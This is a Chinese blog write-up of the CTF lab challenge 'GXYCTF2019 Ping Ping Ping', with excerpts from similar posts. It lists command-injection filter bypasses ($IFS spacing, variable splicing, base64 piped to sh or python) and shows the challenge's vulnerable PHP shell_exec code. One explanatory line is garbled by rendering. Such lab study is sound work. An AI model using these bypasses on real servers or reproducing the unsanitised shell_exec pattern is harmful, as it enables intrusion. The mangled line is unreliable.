ctf-ping命令执行

最新推荐文章于 2024-06-06 16:58:38 发布
最新推荐文章于 2024-06-06 16:58:38 发布
阅读量9.9k 收藏 24
点赞数 2
分类专栏: buuctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/109557567
版权

[GXYCTF2019]Ping Ping Ping

现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么
在这里插入图片描述

ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有

{cat,flag.php} 
cat${IFS}flag.php
cat$IFS$9flag.php
cat<flag.php
cat<>flag.php
kg=$'\x20flag.php'&&cat$kg
a=c;b=at;c=flag.php;$a$b $c
b=ag;a=fl;cat$IFS$1$a$b.php
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash
echo$IFS$1aW1wb3J0IG9zCnByaW50KG9zLnN5c3RlbSgnY2F0IGZsYWcucGhwJykp|base64$IFS$1-d|python3

要是禁用cat的话可以用less、more、tac、ca\t等绕过

具体效果如下

在这里插入图片描述

在这里插入图片描述
在这题中试了好几个,试到第三个的时候发现有回显

在这里插入图片描述
查看源码的时候发现已经绕过,查看当前目录的所有文件的内容。(今年强网杯也出现了这个姿势)

cat `ls`
cat *

在这里插入图片描述

强网杯
在这里插入图片描述

当然也还有其他的姿势,不过我们先分析源码

/?ip=
<pre>PING 127.0.0.1 (127.0.0.1): 56 data bytes
<?php
$flag = "flag{f273e20f-2a0f-4914-9961-5acc4026f7f5}";
?>
/?ip=
<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}

?>

第一关是过滤掉一些特殊符号像:\、&、{、}、<、>、*等这些

 if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match))

所以我们只能用没有被过滤的符号组成payload

第二关是过滤了空格

 if(preg_match("/ /", $ip))

可以用 $IFS$9 来绕过

第三关是过滤了bash

 if(preg_match("/bash/", $ip))

可以用 echo$IFS 1 Y 2 F 0 I G Z s Y W c u c G h w ∣ b a s e 64 1Y2F0IGZsYWcucGhw|base64 1Y2F0IGZsYWcucGhwbase64IFS$1-d|sh 来绕过,这句话的意思是先把cat flag.php 进行base64加密然后解密再用sh执行并把结果输入出来

第四关是匹配一个字符串中,是否按顺序出现过flag四个字母

 if(preg_match("/.*f.*l.*a.*g.*/", $ip))

可以采用字符串拼接 b=ag;a=fl;cat$IFS 1 1 1a$b.php 让他不按顺序出现就好

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
专栏目录
[SWPUCTF 2023 秋季新生赛]Pingpingping
dalaojiaoweb的博客
09-04 362
在payload中我们使用了“||”符号,“||” 是一个管道操作符,它用于在命令行中执行多个命令,当前一个命令执行成功时,才会执行后一个命令。这里我测试的是任何ip都可以。可以看到我们这里面的ping命令形式是不完整的,所以我们必须要先补全我们的ping命令再进行cat命令抓取。那么很明了的思路就是使用我们的cat命令抓取我们的flag。,它被转化为_之后,后面的字符就会被保留下来不会被替换。直接给出了我们的源代码,我来简单的进行一些代码解说。所以我们必须先转义前面的字符,以防止后面的点被转义。
[GXYCTF2019]Ping Ping Ping {命令执行总结}
qq_42812036的博客
02-13 6001
0x00 知识点 命令注入 绕过空格、敏感字符、连接符 0x01 解题 方法一 内联执行 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ps: 参数顺序要注意,adc换位acdflag会被检测出来:) 过滤了?/\{}()[]* 否则bash语法可以用“?”,正斜杠“/”,数字和字母来执行系统命令。 过滤空格 1.使用<或者<&gt...
ctfping命令执行绕过
m0_75178803的博客
10-10 1112
相关wp参考在用linux命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令方式:command1;command2用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败,所有命令都会执行。方式:command1 | commandLinux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。总之就是,
CTF入门笔记之ping
qq_37410729的博客
11-02 4347
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
CTF演练---ping
最新发布
2301_78637299的博客
06-06 625
CTF演练---ping--->只需要输入ip,就可以获取到你想要的
[GXYCTF2019]Ping Ping Ping(命令执行)
mafucan的博客
06-21 737
常见写法127.0.0.1&&+code 只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才 会被执行。 127.0.0.1&+code &表示将任务置于后台执行 127.0.0.1||+code 只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才 会被执行。 127.0.0.1|+code | 表示管道,上一条命令的输出,作为下一条命令的参数 127.0.0.1;+code 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块1、 | 通
ctfhub-远程连接命令/代码执行漏洞
ad12456的博客
05-04 900
CTFHub练习
CTFping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9627
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
buuctf-ping
m0_62094846的博客
11-13 1161
要输入地址,第一反应127.0.0.1,试一试 应该是ping对了 网络查询ping:测试网络连接量的程序,可以确定本地主机能否与另一台主机成功连接,并确定参数等信息是否设置正确 ping命令用法: windowsping 在Windows系列的操作系统中,我们都可以使用ping命令来解决网络中出现的路由问题,方法如下 [5] : ①检查当前的IP配置。在Windows系统中使用ipconfig.exe检查IP配置。 ②在Windows系统中,ping命令允许在命令行中输入选...
青少年CTF-Web-Easy PingMe攻略
小苏
11-30 970
分号字符,决定使用这个符号进行操作,经过这条命令可以得知本目录下还有一个文件名为【flag.php】,猜测flag就在该文件中,所以使用【1.1.1.1;这是因为他是php语言,且将flag赋值在了变量中,并没有将它进行输出!第二步:开始尝试注入,先测试是否会过滤一些字符之类的操作 这里以【1.1.1.1;见怪不怪了,尝试【CTRL+U】查看源代码看看是否有什么东西出现!end:遇到命令注入的可以尝试【;前言:根据题目意思得知该题目为命令执行命令注入】第一步:启动靶场,然后打开链接查看原型。
CTF下的命令执行
Lemon's blog
04-28 9753
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTF——ping相关
jklw4的博客
09-12 4480
Ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序 [1] 。 Ping是工作在 TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo 请求报文,测试目的站是否可达及了解其有关状态 [2] 。 检测是否可以注入 127.0.0.1;whoami 如果存在注入,得到的结果是“www-data” ping 题目
CTF关于ping命令注入问题(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
CTF中的命令执行绕过方式
2401_84466223的博客
06-03 1067
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
buuctfPing Ping Ping命令执行
zzqzzq11的博客
08-06 1351
buuctf
[GXYCTF 2019]Ping Ping Ping
m0_73612768的博客
12-26 1102
ping 命令执行。本题三种解法,反引号,赋值,base64 加密。
CTF题目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 1903
ctf获取flag入门
[GXYCTF2019]Ping Ping Ping
satasun的博客
05-21 5948
打开链接,页面提示/?ip= 猜测本题的意思是让我们把这个当做变量上传参数。 先输入127.0.0.1 看来把我们上传的东西当做ip来执行ping操作。 试试看能不能利用一下管道: ?ip=127.0.0.1;dir 诶,不行,dir是windows下的,说不定服务器是linux的 ?ip=127.0.0.1;ls 出现了flag.php,那么简单的? cat flag.php走起 ?ip=127.0.0.1;cat flag.php 嗯?过滤空格? 过滤空格的解决办法如下 $IFS ${IFS} $I
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值